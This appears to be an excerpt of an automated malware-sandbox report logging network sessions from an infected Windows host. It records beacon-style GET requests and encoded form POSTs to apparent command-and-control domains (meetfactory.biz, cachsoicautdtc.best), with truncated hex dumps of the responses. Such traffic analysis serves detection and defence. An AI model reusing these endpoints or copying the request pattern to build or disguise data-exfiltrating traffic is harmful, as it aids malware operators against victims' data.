                                                                                                                                                                                                                                                              Data Raw: 32 36 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 e6 c3 76 82 69 20 9d d4 8d 89 09 b1 93 d4 09 36 97 8c 90 14 4b 0e 48 04 04 98 74 fa df 0b b8 13 d3 71 2f d5 41 d2 ae 76 df ee be d5 5a 1f be cf c7 8b d5 ed a5 44 44 1c 9d 1f 59 cd 21 45 80 ad 6d 19 33 f9 fc 48 aa 97 45 30 40 bb 6b 2b c6 58 00 09 12 90 66 58 d8 f2 c3 62 d2 1b fd b1 dc 3f 13 21 92 1e 7e cd 69 61 cb db 5e 0e 7a 90 c7 09 10 34 8c b0 2c 41 ce 04 66 b5 ef f4 d2 c6 68 8d 0f bc 19 88 b1 2d 17 14 97 09 4f 45 c7 a1 a4 48 10 1b e1 82 42 dc 6b 85 cf 12 65 54 50 10 f5 32 08 22 6c eb 8a d6 85 13 54 44 f8 dc 52 77 67 5b 4e 9b 24 e3 19 4c 69 22 f6 65 fd 3b f7 14 3f a7 38 23 9d 14 b4 b3 3c 8d ec a6 be 2f aa 5a 96 a5 a1 29 31 c6 e2 19 40 c1 d3 4a 09 e9 9b 2a 4b ea 1e d7 52 0f 63 59 2d 85 5d 8e 0e e3 9c fc 47 1c 4b dd b7 c8 0a 39 aa 24 ce 22 0e 90 2d 23 fe b4 bb 7e fc d4 a5 65 57 bc 24 aa a4 e6 59 e0 ad 50 37 a0 00 3b 6d c7 ae e1 e4 39 67 50 50 ce a4 0e 94 f4 f3 9d c9 c6 a4 59 25 65 88 97 8a e0 89 12 71 58 77 9a [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 263SMs0WPvvi 6KHtq/AvZDDY!Em3HE0@k+XfXb?!~ia^z4,Afh-OEHBkeTP2"lTDRwg[N$Li"e;?8#</Z)1@J*KRcY-]GK9$"-#~eW$YP7;m9gPPY%eqXw3UI$:kNlx[SdF44qh#C7 8}:q0~szAzZVx0~A\9h^G>^3-'^&0iVU6rhlrLJlUi"og9QRsZm^jNCIOX$9a]\C7<D$L@|fkgdo7^m7Pk0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              53192.168.11.204980272.14.178.17480
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.618822098 CEST552OUTGET /o0e7/?9B6h=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.753396034 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:41:18 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 34 39 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 6d 65 65 74 66 61 63 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 49C<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.meetfactory.biz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.meetfactory.biz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1728474078.0025735182&other_args=eyJ1cmkiOiAiL28wZTciLCAiYXJncyI6ICI5QjZoPXhIdWhpaEE1YTBSQ1FEcjdVcXBhd1QxY1lMOUJPcWdiZGdaMy8zOHdEN2xyU3JVNmxsSFV0MTlTZzY1VzRBSWtpSFJ6NjQwT3RGSGxPcmVwYm1xQ1JNTjBSbjNhOEh2SE5tNlIxV09PeU1VYXhjNVNkcUVCazRvPSZGbFM9M2xkSDVka0gtZEJMZiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsa [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.753633976 CEST59INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: } </script> </body></html>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              54192.168.11.2049803172.67.191.24180
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.221096992 CEST832OUTPOST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 5a 4c 47 52 55 37 41 54 33 49 73 59 75 2b 66 74 77 56 57 75 6c 52 57 61 46 62 47 4e 33 42 6b 63 4d 6d 47 30 32 30 39 4a 2f 37 79 4e 57 37 46 6f 58 4e 42 56 36 51 30 6d 4c 39 57 67 64 77 2b 56 4c 33 32 65 49 4d 71 48 38 4b 72 38 4e 65 65 31 58 48 59 32 4a 6d 79 67 6c 32 59 43 4f 50 4a 76 63 7a 71 72 6f 76 71 64 44 6d 5a 73 35 56 61 6d 4e 31 38 45 39 39 51 34 37 55 48 44 56 72 4b 44 53 4d 5a 49 31 55 51 58 63 50 6b 72 52 74 58 6a 66 2b 51 42 65 6b 44 75 71 71 6a 58 46 42 62 4b 2b 43 61 32 36 39 6b 52 45 65 30 53 4c 45 41 4d 49 45 43 45 36 41 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=sROdxZs/CdFUZLGRU7AT3IsYu+ftwVWulRWaFbGN3BkcMmG0209J/7yNW7FoXNBV6Q0mL9Wgdw+VL32eIMqH8Kr8Nee1XHY2Jmygl2YCOPJvczqrovqdDmZs5VamN18E99Q47UHDVrKDSMZI1UQXcPkrRtXjf+QBekDuqqjXFBbK+Ca269kREe0SLEAMIECE6A==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328573942 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:42:56 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:43:11 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4tYBeVB1BZDJXyUAnHlenNutWz6%2FB%2Bqywr44Mw4MxVCnfeoHptJoQhhRDTx2ued3i4xa1jPRbBtaAJnhZ4OhOZ2QZJIC9kebQqT85%2FkJf6ox7xa5q12UEoEZbx9UHeHmBO7KJh9YT%2B3vbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c31af4c4358-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 36 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f dc b8 11 fe be bf 62 ac 02 f6 2e 60 4a de bc 5c 1c 5b ab e2 9a b8 80 81 14 97 5e 1c b4 c1 21 30 28 72 b4 e2 99 22 55 92 5a 79 e1 fa bf 17 14 a5 b5 f6 c5 be 06 2d 60 c0 a2 38 7c 66 e6 e1 33 23 72 d3 a3 8f bf 7c b8 f9 f6 f9 0a 4a 57 c9 6c 92 1e 11 f2 9b 28 40 3a b8 be 82 77 df 33 48 fd 04 30 49 ad 5d 44 4a 93 df 2d 08 fc 09 b4 e4 02 23 90 54 2d 17 11 2a f2 f5 4b 94 41 7a f4 1b 2a 2e 8a ef 84 3c 41 f5 38 00 87 a1 de fd 18 d4 f9 0b 50 e7 3f 00 b5 74 3d 9a 7f 71 28 cb 7d 14 42 b6 91 4a a4 3c 9b a4 4e 38 89 d9 cf ce a1 72 42 2b f8 15 ff d5 08 83 fc 08 fe 0d 1f a4 6e 78 21 a9 c1 34 09 76 93 b4 42 47 81 95 d4 58 74 8b e8 eb cd 5f c9 79 04 c9 30 51 3a 57 13 8f b0 5a 44 1f b4 f2 a0 e4 66 5d 63 04 2c 8c 16 91 c3 7b 97 f8 78 2f 37 30 2f a1 fc 93 7c fd 99 7c d0 55 4d 9d c8 e5 18 e8 fa 6a 71 c5 97 38 5a a7 68 85 8b c8 e8 5c 3b 3b 32 54 5a 28 8e f7 a7 a0 74 a1 a5 d4 ed de 92 95 c0 b6 d6 c6 8d 16 b5 82 bb 72 c1 71 25 18 92 6e 70 2a 94 70 82 4a 62 19 95 b8 98 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 6cdXmob.`J\[^!0(r"UZy-`8|f3#r|JWl(@:w3H0I]DJ-#T-*KAz*.<A8P?t=q(}BJ<N8rB+nx!4vBGXt_y0Q:WZDf]c,{x/70/||UMjq8Zh\;;2TZ(trq%np*pJb)D["_D6`aK1;dWg8yr!{9C/Gj\CERr.1@d2R g'eF.G:mb+Es|_P\1j}B3=z|#?9QtXz`5*/]IY_I!Tq'~2kXI.5;v$
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328742981 CEST1173INData Raw: 4d 86 d4 f6 aa 68 32 49 93 be 90 3c 77 3e f9 94 8b 55 bf ff a4 35 b4 ae d1 44 59 07 d7 cd f4 45 ca 8a 10 12 0c 0f a4 db 20 3f ec 23 ee c6 bd 92 46 39 44 c0 a9 a3 c4 19 aa ac a4 0e 7d 89 7b 62 6f 83 91 8d b2 cf 12 a9 45 08 af fb 4c 6d 9c 26 5c ac
                                                                                                                                                                                                                                                              Data Ascii: Mh2I<w>U5DYE ?#F9D}{boELm&\Fqv^GG5nkb'Tig#<Bkw^~6f}k@IW9y1Q$@R[S|9}KCkn0NCIZ08XuiRQI W=WbYJ,
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328753948 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              55192.168.11.2049804172.67.191.24180
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.849598885 CEST852OUTPOST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 59 71 32 52 58 61 41 54 78 6f 73 5a 77 75 66 74 2b 31 57 71 6c 52 61 61 46 66 65 64 33 54 77 63 4d 44 69 30 33 31 39 4a 36 37 79 4e 65 62 46 68 4b 64 42 65 36 51 34 41 4c 39 71 67 64 77 71 56 4c 7a 2b 65 49 38 57 45 38 61 72 70 55 4f 65 33 4a 33 59 32 4a 6d 79 67 6c 31 6c 6e 4f 50 52 76 64 43 36 72 71 4c 2b 65 64 32 5a 76 70 31 61 6d 4a 31 38 49 39 39 51 61 37 56 62 70 56 70 79 44 53 4e 70 49 31 47 34 55 48 66 6b 68 65 4e 57 73 61 66 52 34 66 48 4c 63 6b 70 48 38 45 67 54 6c 32 30 4c 73 6e 50 51 31 48 4e 6f 67 50 30 35 6b 4b 47 44 66 6e 4c 42 7a 6a 4a 51 31 71 6b 41 43 47 41 47 73 33 58 6e 37 6c 77 67 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=sROdxZs/CdFUYq2RXaATxosZwuft+1WqlRaaFfed3TwcMDi0319J67yNebFhKdBe6Q4AL9qgdwqVLz+eI8WE8arpUOe3J3Y2Jmygl1lnOPRvdC6rqL+ed2Zvp1amJ18I99Qa7VbpVpyDSNpI1G4UHfkheNWsafR4fHLckpH8EgTl20LsnPQ1HNogP05kKGDfnLBzjJQ1qkACGAGs3Xn7lwg=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958468914 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:42:58 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:43:13 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OB4sVnGlUHarp1LHVo5UOp6zl2Bi8YCcVI%2Fau3%2FrZPGbuRE8MyysLlOPEb%2FM5%2FHvaWtS15g%2FfFr4LxcLQnZGx782zVFvzbMpCOugJdEg%2FYaZ2aEtJzG2QsvdHM3K4DYc1%2F%2BJmIwBgIdtSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c4218f66a59-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 36 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f dc b8 11 fe be bf 62 ac 02 f6 2e 60 4a de 5c 5e 1c 5b ab e2 9a b8 80 81 14 97 5e 1c b4 c1 21 30 28 72 b4 e2 99 22 55 92 5a 79 e1 fa bf 17 14 a5 b5 f6 c5 be 06 2d 60 c0 a2 38 7c 66 e6 e1 33 23 72 d3 a3 8f bf 7c b8 f9 f6 f9 0a 4a 57 c9 6c 92 1e 11 f2 9b 28 40 3a b8 be 82 77 df 33 48 fd 04 30 49 ad 5d 44 4a 93 df 2d 08 7c 0b 5a 72 81 11 48 aa 96 8b 08 15 f9 fa 25 ca 20 3d fa 0d 15 17 c5 77 42 9e a0 7a 1c 80 c3 50 ef 7e 0c ea fc 05 a8 f3 1f 80 5a ba 1e cd bf 38 94 e5 3e 0a 21 db 48 25 52 9e 4d 52 27 9c c4 ec 67 e7 50 39 a1 15 fc 8a ff 6a 84 41 7e 04 ff 86 0f 52 37 bc 90 d4 60 9a 04 bb 49 5a a1 a3 c0 4a 6a 2c ba 45 f4 f5 e6 af e4 3c 82 64 98 28 9d ab 89 47 58 2d a2 0f 5a 79 50 72 b3 ae 31 02 16 46 8b c8 e1 bd 4b 7c bc 97 1b 98 97 50 fe 49 be fe 4c 3e e8 aa a6 4e e4 72 0c 74 7d b5 b8 e2 4b 1c ad 53 b4 c2 45 64 74 ae 9d 1d 19 2a 2d 14 c7 fb 53 50 ba d0 52 ea 76 6f c9 4a 60 5b 6b e3 46 8b 5a c1 5d b9 e0 b8 12 0c 49 37 38 15 4a 38 41 25 b1 8c 4a 5c cc [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 6ceXmob.`J\^[^!0(r"UZy-`8|f3#r|JWl(@:w3H0I]DJ-|ZrH% =wBzP~Z8>!H%RMR'gP9jA~R7`IZJj,E<d(GX-ZyPr1FK|PIL>Nrt}KSEdt*-SPRvoJ`[kFZ]I78J8A%J\EdZ-]/"VWYAiXDHTQ]<m5tYf)eM9jyql2)}|^2#jMD#EWbI61ND>/V(r~B>P|or>iB(s:XQ=p$$*ezXwy\Z5,$
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958524942 CEST1182INData Raw: 04 bb c7 d9 04 e0 71 92 26 43 6a 7b 55 34 99 a4 49 5f 48 9e 3b 9f 7c ca c5 aa df 7f d2 1a 5a d7 68 a2 ac 83 eb 66 fa 22 65 45 08 09 86 07 d2 6d 90 1f f6 11 77 e3 5e 49 a3 1c 22 e0 d4 51 e2 0c 55 56 52 87 be c4 3d b1 b7 c1 c8 46 d9 67 89 d4 22 84
                                                                                                                                                                                                                                                              Data Ascii: q&Cj{U4I_H;|Zhf"eEmw^I"QUVR=Fg"}6N.V8;/BD5^*^Y|/[XQE>n+QAg<M(O sQM7@B!QVZ-mw,4)_m$q+A+,XnL
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958544970 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              56192.168.11.2049805172.67.191.24180
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.484154940 CEST2578OUTPOST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 59 71 32 52 58 61 41 54 78 6f 73 5a 77 75 66 74 2b 31 57 71 6c 52 61 61 46 66 65 64 33 53 49 63 50 77 61 30 33 57 6c 4a 35 37 79 4e 55 37 46 73 4b 64 42 35 36 55 55 45 4c 39 6d 57 64 79 53 56 4b 52 6d 65 4f 4f 79 45 7a 61 72 70 4a 65 65 30 58 48 59 76 4a 6d 69 73 6c 32 64 6e 4f 50 52 76 64 42 53 72 75 66 71 65 66 32 5a 73 35 56 61 71 4e 31 38 73 39 35 31 6c 37 56 76 54 57 59 53 44 53 75 52 49 32 7a 6b 55 4c 66 6b 6e 5a 4e 58 7a 61 61 4a 5a 66 48 6e 6d 6b 73 37 61 45 68 62 6c 31 69 47 30 31 63 34 4a 54 4c 38 77 4d 58 68 68 45 6e 62 34 74 4d 4e 2f 6e 62 51 4b 32 55 59 78 5a 42 47 2f 73 53 2f 52 6d 6e 4a 43 6c 4f 79 4c 6f 52 75 48 44 2f 50 6d 75 36 4b 59 33 46 71 35 68 32 79 57 57 6c 57 6e 36 55 55 57 63 6e 59 63 49 2b 71 70 38 46 56 33 50 74 6a 58 78 45 58 55 65 73 44 76 77 58 52 33 78 4a 71 43 48 56 77 6a 6a 50 48 62 2b 36 78 44 7a 56 35 74 41 4c 6d 39 48 42 74 32 4c 47 76 6c 32 42 54 56 79 49 54 48 46 4f 59 6e 79 4d 72 6d 42 43 76 33 6c 63 6d 6a 57 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=sROdxZs/CdFUYq2RXaATxosZwuft+1WqlRaaFfed3SIcPwa03WlJ57yNU7FsKdB56UUEL9mWdySVKRmeOOyEzarpJee0XHYvJmisl2dnOPRvdBSrufqef2Zs5VaqN18s951l7VvTWYSDSuRI2zkULfknZNXzaaJZfHnmks7aEhbl1iG01c4JTL8wMXhhEnb4tMN/nbQK2UYxZBG/sS/RmnJClOyLoRuHD/Pmu6KY3Fq5h2yWWlWn6UUWcnYcI+qp8FV3PtjXxEXUesDvwXR3xJqCHVwjjPHb+6xDzV5tALm9HBt2LGvl2BTVyITHFOYnyMrmBCv3lcmjWqMa8huBBHfcs1X23noBsD2SBRdFHO4MfNqaxaQ+gNX5pTMNxWrF+ex5Eh2AV9zFyLy2Gaywi9/4G6uKkPE7wuqBt1Xw7dfkA04FCtA1onI8KVyciE9CGjfyJHAIWVmBP/7wCF4JJeHyncfZgZXJdKa5nr0UrgAhMeqRWzPv3L5y+grdthjyRqpB2bl0ePg6ZnpsTIBLLn2YQGQMeBlYevZNW+3VWauXXXfGIxNAepqvhoF/9wexG1sbRJFadJ7LGdXN60/D26oN+UTov55MzscMtNsNeEGCF3mxb4/CTy/KFl4r9EXRyAXcjwiwg3siYS/K/mO7HGIRIf/kNeApa4duwlOjvsI2HkkjeA9Pjm4zg4ICjRaZUH5P3reOKymeCdaB72yisKuz1yX8uynLJppY9d1ElDKL+3vf9zuEQXyoo7C7V13xYMC3YDm9Y8GXlDP00/leIIf7kXLPobp0JECdPuWVfECFd8IQHdARI6TrUWqXvfvH0pd6VO54lv5Ej15G84X19mEEJ4wAr1Etm5TTNmKvXLUdpWNHI6FSay5sGcLIqjRTdZtgOkH2goyM5LKqeWOowMmCBxqqD7pvYltZRYskFOTWKGC+Ybu9edMAZihPfTzDGBrzTif0+VbFahVX1pXP2KBPWvoIbFtEZMSkbsvlxSVX1Hy [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.484174013 CEST1289OUTData Raw: 45 34 76 47 67 58 48 32 34 59 36 4b 6e 7a 49 32 65 4f 30 63 58 42 31 72 57 52 70 77 52 68 75 6b 65 50 71 54 68 4e 43 72 71 51 41 4b 64 6f 66 41 57 6f 4e 7a 4e 48 6c 55 73 68 32 59 47 62 69 6b 7a 6e 77 55 32 75 43 31 57 70 6d 47 37 2f 73 2b 4a 31
                                                                                                                                                                                                                                                              Data Ascii: E4vGgXH24Y6KnzI2eO0cXB1rWRpwRhukePqThNCrqQAKdofAWoNzNHlUsh2YGbikznwU2uC1WpmG7/s+J1Nsl6gZVY40DiRMh3+r8yRvHBJIC9KQLGrXgBYGzpniiCpjHp3l1Tsr/MULrsRN+jkoN70jFoyOwg4NuUsvmlD0a93XNPrn15G5qWaibbBY0JPEc5AKoZLmUyArGj90z3x1s7jslPk4wyGTzkOyJP8jmfOC2iRki2r
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.484235048 CEST4134OUTData Raw: 66 4f 4e 44 41 6b 73 37 59 41 42 73 45 55 79 4c 32 49 69 78 4b 46 70 2f 4d 74 33 72 77 70 78 54 48 48 68 45 74 30 50 45 33 6c 4a 30 37 34 34 45 31 58 59 4b 48 2b 42 65 76 6b 59 2b 77 2f 4d 4a 45 42 6f 47 36 49 62 4b 58 72 74 32 70 4a 62 5a 68 74
                                                                                                                                                                                                                                                              Data Ascii: fONDAks7YABsEUyL2IixKFp/Mt3rwpxTHHhEt0PE3lJ0744E1XYKH+BevkY+w/MJEBoG6IbKXrt2pJbZhti3z6bL7nqYAgaRQGrV3OaCcd/8DuDpN123rJdSwo5I848FmT208m5idZFMFU9z9KnxjtFpSFPpVV/pUgfcTTB/nD2HuiWsCyDNzSY56o3pSYO8x/nwyAjxwKpuVP0oIN6GleQFnTfwnGHcmz27THmhR4qM6SC28tX
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599069118 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:01 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:43:16 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qy8zvlpjrknXl5TIx%2FaUB1eqp5V%2B%2Bu6BUw%2FZGIxjUJpva3byG7H9v%2FkHaKTlhp9KyZEuEedWwhdclDRKsF8B9e8Ppw%2BUbuS3%2F4dEhP%2FHweB8SsyX4PBlu2XWIGpXHWzDSWmoZ7%2FVmLFADw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c52899632fa-EWR
